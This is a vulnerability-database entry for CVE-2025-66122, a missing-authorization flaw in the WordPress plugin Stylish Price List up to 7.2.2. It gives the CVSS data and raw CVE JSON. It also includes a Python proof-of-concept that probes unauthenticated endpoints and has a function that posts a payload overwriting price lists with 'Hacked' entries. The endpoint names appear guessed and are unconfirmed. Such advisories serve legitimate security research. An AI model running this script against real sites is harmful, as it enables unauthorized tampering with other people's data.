Security Vulnerability Report
中文
CVE-2025-66122 CVSS 5.3 MEDIUM

CVE-2025-66122

Published: 2025-12-16 09:15:57
Last Modified: 2026-04-27 17:16:40

Description

Missing Authorization vulnerability in Design Stylish Price List stylish-price-list allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Stylish Price List: from n/a through <= 7.2.2.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

Stylish Price List插件 <= 7.2.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-66122 PoC - Stylish Price List Access Control Bypass # Target: WordPress site with Stylish Price List plugin <= 7.2.2 TARGET_URL = "http://target-wordpress-site.com" def check_vulnerability(): """Check if the target is vulnerable to CVE-2025-66122""" # Try to access the price list data without authentication endpoints = [ f"{TARGET_URL}/wp-json/stylish-price-list/v1/price-lists", f"{TARGET_URL}/wp-json/stylish-price-list/v1/prices", f"{TARGET_URL}/wp-admin/admin-ajax.php?action=get_stylish_price_lists" ] for endpoint in endpoints: try: response = requests.get(endpoint, timeout=10) # If we get a 200 response without authentication, vulnerability exists if response.status_code == 200: print(f"[+] VULNERABLE: {endpoint}") print(f"[+] Response: {response.text[:500]}") return True else: print(f"[-] Protected: {endpoint} (Status: {response.status_code})") except requests.RequestException as e: print(f"[!] Error accessing {endpoint}: {e}") return False def exploit_unauthorized_modification(): """Attempt to modify price list data without authorization""" modify_endpoint = f"{TARGET_URL}/wp-admin/admin-ajax.php" # Malicious payload to modify price list payload = { 'action': 'stylish_price_list_save', 'price_list_data': '{"prices": [{"name": "Hacked", "price": "$0"}]}' } try: response = requests.post(modify_endpoint, data=payload, timeout=10) if response.status_code == 200: print(f"[+] Modification attempt completed") print(f"[+] Response: {response.text[:500]}") except requests.RequestException as e: print(f"[!] Error during exploitation: {e}") if __name__ == "__main__": print("CVE-2025-66122 PoC - Stylish Price List Access Control Bypass") print("=" * 60) check_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66122", "sourceIdentifier": "[email protected]", "published": "2025-12-16T09:15:56.547", "lastModified": "2026-04-27T17:16:40.430", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Design Stylish Price List stylish-price-list allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Stylish Price List: from n/a through <= 7.2.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/stylish-price-list/vulnerability/wordpress-stylish-price-list-plugin-7-2-2-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}